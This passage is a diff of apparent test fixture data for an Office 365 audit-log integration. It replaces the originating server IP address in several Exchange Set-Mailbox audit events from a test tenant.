@@ -600,7 +600,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -612,7 +612,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", 
@@ -686,7 +686,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -698,7 +698,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -772,7 +772,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -784,7 +784,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -858,7 +858,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -870,7 +870,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -944,7 +944,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -956,7 +956,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1030,7 +1030,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 